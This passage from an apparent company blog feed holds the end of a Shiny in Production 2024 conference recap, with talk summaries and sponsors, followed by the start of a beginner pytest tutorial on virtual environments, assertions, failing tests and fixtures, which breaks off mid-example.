&lt;p&gt;&lt;strong&gt;A minimum viable Shiny infrastructure for serving 95,000 monthly users&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;How do you support many &amp;ndash; many &amp;ndash; users of a Shiny app? Tan took us through
the lifetime of the &lt;a href="https://dynastyprocess.com/" rel="external"&gt;DynastyProcess&lt;/a&gt; Fantasy Football app.
This was originally built by Tan and his friend
Joe Sydlowski. Neither of them had made a Shiny app, and Tan had never written
any R, before this was built and within 2 years of running they had 200,000
unique users per month. A series of top tips were presented to ensure that your
app keeps running, grows with its audience, and gets you that data science job
that you dreamed of. 1) Try running your own shiny server, this cheap option could
help you scale up your app when you need to. 2) Don’t do too much inside your app
either, try pushing as much data processing outside of your app as possible.
3) Log everything and 4) listen to your users. But most importantly, start from where
you are because “there’s always much to learn”.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;a href="https://github.com/tanho63/talk_shinyprod2024_scaling" rel="external"&gt;Talk materials available here&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;
&lt;h3 id="katy-morgan-government-internal-audit-agency"&gt;&lt;a href="https://www.linkedin.com/company/giaa/" rel="external"&gt;Katy Morgan&lt;/a&gt; (Government Internal Audit Agency)&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;More than just a chat bot: Tailoring the use of Generative AI within Government Internal Audit Agency with user-friendly R shiny applications&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Katy presented an insight into three Shiny apps that are used while making
government audits. These are used at different stages of the audit process and
make use of ChatGPT. For example, when thinking about the risks within a
project, what are the possible causes, events associated with, and consequences
of those risks? A series of predefined ChatGPT prompts are used to suggest text
that expert auditors can make use of within their workflow. The apps are
deployed on Azure app service and make use of the Golem framework and docker to
simplify development, deployment and authentication.&lt;/p&gt;
&lt;h3 id="lightning-talks"&gt;Lightning Talks&lt;/h3&gt;
&lt;p&gt;This year also featured a segment for lightning talks with a twist: all speakers would be presenting from auto-scrolling slides which would change every 20 seconds! This turned out to be much less dramatic than anticipated, with our lightning speakers all staying perfectly on time&amp;hellip;&lt;/p&gt;
&lt;p&gt;Here&amp;rsquo;s a brief synopsis of each talk.&lt;/p&gt;
&lt;h4 id="the-sk8-project-a-scalable-institutional-architecture-for-managing-and-hosting-shiny-applications"&gt;The SK8 Project: A scalable institutional architecture for managing and hosting Shiny applications&lt;/h4&gt;
&lt;p&gt;David Carayon (INRAE) started his talk by noting that, while Shiny is a great tool for building web apps, it&amp;rsquo;s not always easy to share these with colleagues. In particular, paid solutions such as Posit and AWS are not always feasible to Shiny users. Enter SK8, which offers a cost-effective solution for deploying Shiny apps to the web using Kubernetes. The deployment process involves an automated CI/CD pipeline which unpacks the app dependencies and creates a Dockerfile which is deployed by Kubernetes to the web. In the space of just a few years, the service has grown to 100 deployed applications! The talk materials can be found &lt;a href="https://hal.inrae.fr/hal-04735290" rel="external"&gt;here.&lt;/a&gt;&lt;/p&gt;
&lt;h4 id="monitoring-and-improving-posit-workbench-usage-behaviour-at-public-health-scotland"&gt;Monitoring and improving Posit Workbench usage behaviour at Public Health Scotland&lt;/h4&gt;
&lt;p&gt;At PHS there are over 450 active users of Posit. Alasdair Morgan showed us how he has been reporting the Posit Workbench usage habits with an aim to keep costs down by avoiding wastage of the allocated resources. User activity is tracked by Azure logs and reported using R Markdown. These reports include hard hitting visualisations of the proportion of allocated memory and CPUs that are actually being used. Remembering that this was a Shiny conference, Alasdair showed us a dashboard highlighting some of the worst offenders! (anonymised of course&amp;hellip;)&lt;/p&gt;
&lt;p&gt;Alasdair&amp;rsquo;s light-hearted examination of the user habits at PHS went down very well with our audience and went on to take the prize for best lightning talk!&lt;/p&gt;
&lt;h4 id="using-google-lighthouse-to-analyse-shiny-applications"&gt;Using Google Lighthouse to analyse Shiny Applications&lt;/h4&gt;
&lt;p&gt;Fresh from his workshop the day before, Osheen MacOscar introduced us to Google Lighthouse, an open source tool for assessing various metrics of web-based apps including load speed, interactivity and accessibility. Selecting 134 Shiny apps from &lt;a href="https://www.appsilon.com/" rel="external"&gt;Appsilon&lt;/a&gt;, Osheen showed that only 40 apps were listed as having &amp;ldquo;good&amp;rdquo; performance. Osheen went on to show that as complexity is added (such as interactive plots and widgets) performance can decrease due to slower load times. However, this is not always a bad thing since widgets can also improve the user experience. In summary, Lighthouse is a great tool for assessing apps but we shouldn&amp;rsquo;t let it stop us from adding (useful) complexity to our apps.&lt;/p&gt;
&lt;h4 id="risk-assessment-as-a-service-project-roll-out"&gt;Risk Assessment as a Service (Project Roll-out)&lt;/h4&gt;
&lt;p&gt;Another of our data scientists, Astrid Radermacher, discussed the importance of risk assessment in various industries and our efforts at JR to roll out package validation as an automated service. Our process involves assessing the package (checking if it is secure and well maintained) and generating a report. If the package passes our checks, it can be included in the client&amp;rsquo;s regulated environment. Otherwise we can offer manual remediation. Having largely focused on package assessment, our next steps will be on improving package remediation and scaling the automated service to different user operating systems. We look forward to onboarding additional clients with the service in early 2025 and releasing to open source in the longer term.&lt;/p&gt;
&lt;h4 id="chagas-diagnostic-algorithms-an-online-application-to-estimate-cost-and-effectiveness-of-diagnostic-algorithms-for-chagas-disease"&gt;Chagas Diagnostic Algorithms: an online application to estimate cost and effectiveness of diagnostic algorithms for Chagas disease&lt;/h4&gt;
&lt;p&gt;Juan Vallarta (FIND) began by outlining the challenges in diagnosing Chagas disease (a global disease which is particularly prevalent in Latin America). Diagnosis is often financially and logistically challenging and can either be conducted in a lab setting or more rapidly onsite. He then presented an &lt;a href="https://finddx.shinyapps.io/chagaspathway" rel="external"&gt;online tool&lt;/a&gt; for estimating the cost and effectiveness of different diagnostic algorithms, taking into account the sensitivity and specificity of each test. The results can be viewed in a user interface and downloaded into an HTML report. The app has been deployed globally not just for Chagas, but other diseases including covid and mpox.&lt;/p&gt;
&lt;h4 id="rainbowr"&gt;&lt;a href="https://rainbowr.org/" rel="external"&gt;rainbowR&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;Our final lightning talk was given by Ella Kaye (University of Warwick) who spoke about &lt;a href="https://rainbowr.org/" rel="external"&gt;rainbowR&lt;/a&gt;, which aims to connect, support and promote LGBTQ+ users within the R community. Since 2017 the rainbowR community has grown to over 130 members and runs monthly meetups. The community also manages a social data project (&lt;a href="https://github.com/r-lgbtq/tidyrainbow" rel="external"&gt;tidyRainbow&lt;/a&gt;) which collates LGBTQ+ datasets. To find out how to join and contribute, check out &lt;a href="https://rainbowr.org/" rel="external"&gt;rainbowr.org/&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id="what-happens-next"&gt;What happens next?&lt;/h2&gt;
&lt;p&gt;We want to say thank you to the sponsors of the event for your support in making it possible!&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.nicd.org.uk/" rel="external"&gt;National Innovation Centre for Data&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://rss.org.uk/" rel="external"&gt;Royal Statistical Society&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.ncl.ac.uk/maths-physics/engagement/nusolve/" rel="external"&gt;NU Solve&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://posit.co/" rel="external"&gt;Posit&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.r-consortium.org/" rel="external"&gt;R Consortium&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Thanks also to our speakers and attendees who travelled from near and far to make it another memorable conference! Check out our &lt;a href="https://youtube.com/@jumping-rivers?si=Cwfi0bgbgFJaXnbq" rel="external"&gt;YouTube channel&lt;/a&gt; where the talk recordings will be released in the coming weeks!&lt;/p&gt;
&lt;p&gt;We&amp;rsquo;re already planning on running Shiny in Production again! The 2025 edition will run on the 8th &amp;amp; 9th of October and you can already grab your super early bird tickets &lt;a href="https://www.eventbrite.co.uk/e/shiny-in-production-2025-registration-1035155587227" rel="external"&gt;here&lt;/a&gt;. We can&amp;rsquo;t wait to share more details with you soon!&lt;/p&gt;
&lt;h2 id="sponsors"&gt;Sponsors&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://www.nicd.org.uk/"&gt;&lt;img src="nicd_logo.png" style="width: 285px; display: block; margin-left: auto; margin-right: auto" alt="NICD logo" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.r-consortium.org/"&gt;&lt;img src="rconsortium-logo.png" style="width: 285px; display: block; margin-left: auto; margin-right: auto" alt="R Consortium logo" /&gt;&lt;/a&gt;
&lt;br&gt;
&lt;a href="https://rss.org.uk/"&gt;&lt;img src="rss_logo.png" style="width: 285px; display: block; margin-left: auto; margin-right: auto; margin-top: 1em" alt="RSS logo" /&gt;&lt;/a&gt;
&lt;br&gt;
&lt;a href="https://www.routledge.com/"&gt;&lt;img src="crc-press-logo.png" style="width: 285px; display: block; margin-left: auto; margin-right: auto; margin-top: 1em" alt="CRC Press logo" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-highlights-2024/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>First Steps in Python Testing</title><link>https://www.jumpingrivers.com/blog/intro-to-pytest/</link><pubDate>Thu, 05 Sep 2024 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/intro-to-pytest/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/intro-to-pytest/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/intro-to-pytest/featured.svg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Programming is a craft, and in data science we often spend countless hours coding. There isn&amp;rsquo;t a
magic shortcut to improving your programming skills. But, like any craft, improvement comes from
practice: challenging yourself, exploring related skills, learning from others, and teaching.&lt;/p&gt;
&lt;p&gt;Testing code using automated tools is common throughout the software development industry. This
technique can improve the quality of the code you write as a data scientist. Testing helps refine
your code, supports redesign, prevents errors, and makes it harder to write single-use code.&lt;/p&gt;
&lt;p&gt;Here, we introduce the pytest framework and show how it can be used to test Python functions. If you
don&amp;rsquo;t use a testing framework as part of your daily workflow, try experimenting with the techniques
presented here the next time you write or extend a function.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2024-intro-to-pytest"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="about-pytest"&gt;About pytest&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://docs.pytest.org/en/stable/" rel="external"&gt;pytest&lt;/a&gt; is a software testing framework, it is a command-line
tool that automatically finds tests you’ve written, runs the tests, and reports the results. In
general, pytest is known for its simplicity, scalability, and powerful features such as fixture
support and parameterization, it has a concise syntax and a rich plugin ecosystem compared to python
standard libraries.&lt;/p&gt;
&lt;h3 id="getting-started-with-pytest"&gt;Getting started with pytest&lt;/h3&gt;
&lt;p&gt;Before we start writing tests, it&amp;rsquo;s important to set up a clean, isolated environment where we can
install and manage packages.
This is done using a virtual environment.&lt;/p&gt;
&lt;p&gt;We first navigate to the project directory and then create a virtual environment for our project.
Then we activate the virtual environment as in the second row of the code, and install pytest.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;$ python3 -m venv venv
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;$ source venv/bin/activate
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;(&lt;/span&gt;venv&lt;span style="color:#ff7b72;font-weight:bold"&gt;)&lt;/span&gt; $ pip install pytest
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We have everything set up to use pytest in our project.
When we are done working in the virtual environment, we can deactivate it by simply running:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;$ deactivate
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now that your environment is set up, let&amp;rsquo;s explore the basics of pytest.&lt;/p&gt;
&lt;h3 id="what-is-a-test"&gt;What is a test?&lt;/h3&gt;
&lt;p&gt;A test is a small piece of code (usually a function) that checks whether another piece of code is
working as expected.
For example, imagine you wrote a function to calculate the mean of a list of numbers. A test would
check if the function correctly computes the mean for different inputs.&lt;/p&gt;
&lt;p&gt;Let&amp;rsquo;s create a simple function that calculates the mean of a list of numbers &lt;code&gt;x&lt;/code&gt; and save it in &lt;code&gt;my_functions.py&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ./my_functions.py&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;calculate_mean&lt;/span&gt;(x):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; sum(x) &lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt; len(x)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;A very nice property of pytest is something called &lt;em&gt;test discovery&lt;/em&gt;, a series of naming conventions
that tell pytest how to go and search for tests and execute them.
Any file that contains test functions should start with &lt;code&gt;test_&lt;/code&gt; and also the tests functions in this
file should be named in the same way.
Then, pytest will automatically search and find these functions and run them.&lt;/p&gt;
&lt;p&gt;Now, let us write a test for this function using pytest.
Create a file named &lt;code&gt;test_my_functions.py&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ./test_my_functions.py&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;my_functions&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; calculate_mean
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;test_calculate_mean&lt;/span&gt;():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; [&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; result &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; calculate_mean(x)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; expected &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3.0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;assert&lt;/span&gt; result &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; expected
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In this example, &lt;code&gt;test_calculate_mean()&lt;/code&gt; is a test function.
It checks if &lt;code&gt;calculate_mean([1, 2, 3, 4, 5])&lt;/code&gt; returns &lt;code&gt;3.0&lt;/code&gt;.
When we run pytest, it will check if the &lt;code&gt;assert&lt;/code&gt; statement holds true.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;$ pytest test_my_functions.py
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=============================&lt;/span&gt; test session &lt;span style="color:#79c0ff"&gt;starts&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;==============================&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;test_my_functions.py . &lt;span style="color:#ff7b72;font-weight:bold"&gt;[&lt;/span&gt;100%&lt;span style="color:#ff7b72;font-weight:bold"&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;==============================&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; passed in 0.01s &lt;span style="color:#ff7b72;font-weight:bold"&gt;===============================&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We can see that the test has successfully passed. In the output, the dot $(.)$ after
&lt;code&gt;test_my_functions.py&lt;/code&gt; indicates that the test has passed.&lt;/p&gt;
&lt;p&gt;Now, let&amp;rsquo;s have a look at an example of a failing test.
Consider the following test function which is in the file &lt;code&gt;test_failing.py&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ./test_failing.py&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;test_addition&lt;/span&gt;():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; result &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; expected &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;assert&lt;/span&gt; result &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; expected
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We run pytest from the command-line and investigate the output.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;$ pytest -v test_failing.py
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=============================&lt;/span&gt; test session &lt;span style="color:#79c0ff"&gt;starts&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;==============================&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;test_failing.py::test_addition FAILED &lt;span style="color:#ff7b72;font-weight:bold"&gt;[&lt;/span&gt;100%&lt;span style="color:#ff7b72;font-weight:bold"&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;===================================&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FAILURES&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;===================================&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;________________________________ test_addition _________________________________
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; def test_addition&lt;span style="color:#ff7b72;font-weight:bold"&gt;()&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#79c0ff"&gt;result&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt; + &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#79c0ff"&gt;expected&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;gt; assert &lt;span style="color:#79c0ff"&gt;result&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; expected
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;E assert &lt;span style="color:#79c0ff"&gt;4&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;test_failing.py:4: &lt;span style="color:#79c0ff"&gt;AssertionError&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;===========================&lt;/span&gt; short test summary &lt;span style="color:#79c0ff"&gt;info&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;============================&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;FAILED test_failing.py::test_addition - assert &lt;span style="color:#79c0ff"&gt;4&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;==============================&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; failed in 0.03s &lt;span style="color:#ff7b72;font-weight:bold"&gt;===============================&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This time pytest provides us with a message giving information on the error and also highlights any
reasons that have caused the test to fail. The &lt;code&gt;-v&lt;/code&gt; or &lt;code&gt;--verbose&lt;/code&gt; command-line flag is used to
reveal more verbose output.&lt;/p&gt;
&lt;h3 id="the-assert-statement"&gt;The assert statement&lt;/h3&gt;
&lt;p&gt;The &lt;code&gt;assert&lt;/code&gt; statement is used to verify that a given condition is &lt;code&gt;True&lt;/code&gt;.
If the condition is &lt;code&gt;False&lt;/code&gt;, the test fails.
In our first example the statement, &lt;code&gt;assert result == expected&lt;/code&gt;
asserts that the result from &lt;code&gt;calculate_mean(x)&lt;/code&gt;
should equal &lt;code&gt;3.0&lt;/code&gt;. If the assert statement is not true, pytest reports a failure.&lt;/p&gt;
&lt;h3 id="pytest-fixtures"&gt;Pytest fixtures&lt;/h3&gt;
&lt;p&gt;Suppose you had written several functions that all work on some non-trivial dataset,
and you want to write a test-function for each. In each test-function, you would
have to create a dataset of the required form, pass it into the function-under-test,
and then compare the output to some expected value. The code for creating a
test-dataset may get duplicated between the different test-functions.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://docs.pytest.org/en/6.2.x/fixture.html" rel="external"&gt;Fixtures&lt;/a&gt; in pytest are helper functions which are
used to set up conditions that we want to be available for multiple tests. This might involve
putting together some test data, or preparing some other state before a test runs (connecting to a
database, creating a temporary file). Fixtures are run before (and sometimes after) the actual test
functions. The &lt;em&gt;@pytest.fixture&lt;/em&gt; decorator is used to tell pytest that a function is a fixture.
Fixtures can perform actions (like setting up a database connection), and can inject data into a
test function.&lt;/p&gt;
&lt;p&gt;To illustrate let us consider a fixture that provides us with a list of numbers
in our test file &lt;code&gt;test_my_functions.py&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ./test_my_functions.py&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pytest&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;my_functions&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; calculate_mean
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;@pytest.fixture&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sample_numbers&lt;/span&gt;():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; [&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;test_calculate_mean&lt;/span&gt;(sample_numbers):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; result &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; calculate_mean(sample_numbers)
